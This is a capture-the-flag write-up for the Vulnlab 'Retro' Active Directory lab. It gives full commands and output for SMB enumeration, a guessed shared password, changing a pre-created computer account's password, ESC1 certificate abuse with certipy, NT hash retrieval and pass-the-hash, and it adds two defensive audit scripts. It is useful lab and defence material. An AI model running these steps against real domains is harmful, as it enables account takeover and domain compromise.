Vulnlab Windows Easy: Retro

Retro is an Easy rated Windows machine on Vulnlab.

Nmap Scan

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn -p- 10.10.89.171
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-30 12:57 CET
Nmap scan report for 10.10.89.171
Host is up (0.026s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-30 12:07:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   DNS_Tree_Name: retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-01-30T12:07:49+00:00
|_ssl-date: 2024-01-30T12:08:29+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-01-29T11:54:01
|_Not valid after:  2024-07-30T11:54:01
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49723/tcp open  msrpc         Microsoft Windows RPC
49867/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-30T12:07:54
|_  start_date: N/A
|_clock-skew: mean: 5s, deviation: 0s, median: 5s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 643.80 seconds

Add the domain and the FQDN of the DC to the hosts file.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts | grep 10.10.89.171               
10.10.89.171 retro.vl dc.retro.vl

Enumerate SMB (Port 139/445)

List SMB shares.

┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.10.89.171\\
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Notes           Disk      
        SYSVOL          Disk      Logon server share 
        Trainees        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.89.171 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Retrieve files.

┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.89.171\\Trainees
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 23 23:58:43 2023
  ..                                DHS        0  Wed Jul 26 11:54:14 2023
  Important.txt                       A      288  Mon Jul 24 00:00:13 2023

                6261499 blocks of size 4096. 2222554 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)

Content of the text file (all trainees share one account, which hints at a shared username).

┌──(kali㉿kali)-[~]
└─$ cat Important.txt                                
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

User enum

Enumerate users using impacket-lookupsid.

┌──(kali㉿kali)-[~]
└─$ impacket-lookupsid anonymous@10.10.89.171
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at 10.10.89.171
[*] StringBinding ncacn_np:10.10.89.171[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)

User file:

┌──(kali㉿kali)-[~]
└─$ cat users                         
krbtgt 
trainee 
BANKING$
jburley 
tblack
HelpDesk

SMB enum

As the note suggested, the trainees share one account, so list the shares again with the credentials trainee:trainee.

┌──(kali㉿kali)-[~]
└─$ smbmap -u "trainee" -p "trainee" -H 10.10.89.171                

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.89.171:445        Name: retro.vl                  Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Notes                                                   READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Trainees                                                READ ONLY

Retrieve content from the Notes share.

┌──(kali㉿kali)-[~]
└─$ smbclient -U "trainee" \\\\10.10.89.171\\Notes
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul 24 00:03:16 2023
  ..                                DHS        0  Wed Jul 26 11:54:14 2023
  ToDo.txt                            A      248  Mon Jul 24 00:05:56 2023

                6261499 blocks of size 4096. 2246987 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)

Content of ToDo.txt.

┌──(kali㉿kali)-[~]
└─$ cat ToDo.txt                                                    
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

Earlier we found the BANKING$ computer account. A pre-created computer account still carries its initial password, the lowercase computer name without the trailing $, so let's try to change it with impacket.

┌──(kali㉿kali)-[~]
└─$ impacket-changepasswd retro.vl/banking$:banking@10.10.89.171 -altuser trainee -altpass trainee -newpass 'password123!'
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Attempting to *change* the password of retro.vl/banking$ as retro.vl/trainee. You may want to use '-reset' to *reset* the password of the target.
[*] Changing the password of retro.vl\banking$
[*] Connecting to DCE/RPC as retro.vl\trainee
[*] Password was changed successfully.
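
The pre-created account that ToDo.txt describes, and that the password change above relies on, is something a defender can find first. The following audit is an added example, not code from the original post: it runs over constructed records shaped like AD computer objects (a real run would feed it the results of an LDAP query), and the heuristics in the comments are assumptions to tune per environment.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bits used below (standard AD values).
PASSWD_NOTREQD = 0x0020             # left behind by the "pre-Windows 2000 computer" option
WORKSTATION_TRUST_ACCOUNT = 0x1000  # member computer
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller

# Constructed records in the shape an LDAP search for (objectClass=computer)
# returns. Attribute names are the real AD ones; the values are made up apart
# from the BANKING$ name taken from the page.
NOW = datetime(2024, 1, 30, tzinfo=timezone.utc)

def days_ago(n):
    return NOW - timedelta(days=n)

SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$", "userAccountControl": 0x82000, "logonCount": 812,
     "pwdLastSet": days_ago(12), "whenCreated": days_ago(190)},
    {"sAMAccountName": "BANKING$", "userAccountControl": 0x1020, "logonCount": 0,
     "pwdLastSet": days_ago(190), "whenCreated": days_ago(190)},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000, "logonCount": 45,
     "pwdLastSet": days_ago(20), "whenCreated": days_ago(300)},
    {"sAMAccountName": "OLDPRINT$", "userAccountControl": 0x1000, "logonCount": 0,
     "pwdLastSet": days_ago(500), "whenCreated": days_ago(500)},
]

def precreated_findings(computers, now=NOW, stale_days=90):
    """Map each suspicious member-computer account to the reasons it was flagged.

    Heuristics (assumptions): PASSWD_NOTREQD is left behind by the pre-Windows
    2000 option; an account that never logged on and still has its
    creation-time password was never joined; a joined machine rotates its
    password every 30 days by default, so an old pwdLastSet is a second signal.
    """
    findings = {}
    for c in computers:
        uac = c["userAccountControl"]
        if not uac & WORKSTATION_TRUST_ACCOUNT or uac & SERVER_TRUST_ACCOUNT:
            continue  # skip DCs and non-computer objects
        reasons = []
        if uac & PASSWD_NOTREQD:
            reasons.append("PASSWD_NOTREQD set (pre-Windows 2000 option)")
        unchanged = abs(c["pwdLastSet"] - c["whenCreated"]) < timedelta(minutes=5)
        if c["logonCount"] == 0 and unchanged:
            reasons.append("never logged on, password unchanged since creation")
        if reasons and (now - c["pwdLastSet"]).days > stale_days:
            reasons.append(f"password older than {stale_days} days")
        if reasons:
            findings[c["sAMAccountName"]] = reasons
    return findings
```

Accounts it reports are candidates to delete, or to reset and disable until a machine actually joins with them.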

Enumerate certs

These credentials can't be used to authenticate over SMB or WinRM, so instead use the machine account to enumerate the certificate templates for misconfigurations.

┌──(kali㉿kali)-[~]
└─$ certipy find -vulnerable -u 'BANKING$'@retro.vl -p 'password123!' -dc-ip 10.10.89.171 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
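
A defender can apply the same ESC1 test to a saved Certipy report without re-running it against the CA. This is an added example, not part of the original post or of Certipy itself: it parses the text layout shown above, the sample input is constructed, and it checks only the client-authentication case flagged on this page (not the Any Purpose or Enrollment Agent variants).

```python
import re

# Constructed sample in the layout of Certipy's 'find' output (fields this check
# does not read are omitted); entry 0 mirrors the page's RetroClients template,
# entry 1 is a hypothetical template that does not let the enrollee supply the subject.
SAMPLE = """\
Certificate Templates
  0
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
        Enrollment Rights               : RETRO.VL\\Domain Admins
                                          RETRO.VL\\Domain Computers
                                          RETRO.VL\\Enterprise Admins
  1
    Template Name                       : SafeUser
    Enrollee Supplies Subject           : False
        Enrollment Rights               : RETRO.VL\\Domain Users
"""

# Principals that amount to "anyone holding a domain credential".
BROAD = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
# Settings that together let an enrollee pick a SAN the DC accepts for logon.
ESC1_PRECONDITIONS = {"Enabled": "True", "Client Authentication": "True",
                      "Enrollee Supplies Subject": "True",
                      "Requires Manager Approval": "False",
                      "Authorized Signatures Required": "0"}
TEMPLATE_START = re.compile(r"^ {2}\d+$")
KEY_VALUE = re.compile(r"^ {4,8}(\S[^:]*?)\s*:\s*(.*)$")
CONTINUATION = re.compile(r"^ {40,}(\S.*)$")  # extra list entries without a key

def parse_templates(text):
    # One dict per entry in the 'Certificate Templates' section.
    templates, last_key = [], ""
    for line in text.split("Certificate Templates", 1)[-1].splitlines():
        if TEMPLATE_START.match(line):
            templates.append({})
        elif templates and (kv := KEY_VALUE.match(line)):
            last_key, value = kv.group(1).strip(), kv.group(2).strip()
            # Rights and principal fields are lists continued on deeper-indented lines.
            is_list = last_key.endswith(("Rights", "Principals"))
            templates[-1][last_key] = [value] if is_list else value
        elif templates and (cont := CONTINUATION.match(line)):
            if isinstance(templates[-1].get(last_key), list):
                templates[-1][last_key].append(cont.group(1).strip())
    return templates

def esc1_report(text):
    # Map each template meeting the ESC1 preconditions to its broad enrollers.
    report = {}
    for tpl in parse_templates(text):
        if all(tpl.get(k) == v for k, v in ESC1_PRECONDITIONS.items()):
            hits = [p for p in tpl.get("Enrollment Rights", []) if p.split("\\")[-1] in BROAD]
            if hits:
                report[tpl["Template Name"]] = hits
    return report
```

The fix for a template it reports is to drop the broad enrollment right or turn off "Enrollee Supplies Subject" (or require manager approval), then re-run the report.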

The RetroClients template lets the enrollee supply the subject and is enrollable by Domain Computers, so BANKING$ can request a certificate that carries the administrator's UPN.

┌──(kali㉿kali)-[~]
└─$ certipy-ad req -u 'banking$'@retro.vl -p 'password123!' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.retro.vl' at '195.130.130.4'
[+] Trying to resolve 'RETRO.VL' at '195.130.130.4'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.89.171[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.89.171[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with multiple identifications
    UPN: 'administrator@retro.vl'
    DNS Host Name: 'dc.retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc.pfx'

Admin shell

With the administrator's PFX file we can authenticate via PKINIT and retrieve the account's NT hash.

┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx administrator_dc.pfx -dc-ip 10.10.89.171
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'administrator@retro.vl'
    [1] DNS Host Name: 'dc.retro.vl'
> 0
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

Pass-the-hash using evil-winrm to gain a shell as the administrator user.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -u administrator -H "252fac7066d93dd009d4fd2cd0368389" -i 10.10.89.171  

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
retro\administrator

Root flag: VL{8b13de0d077813ff16c5e792186bdde4}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{8b13de0d077813ff16c5e792186bdde4}

This post is licensed under CC BY 4.0 by the author.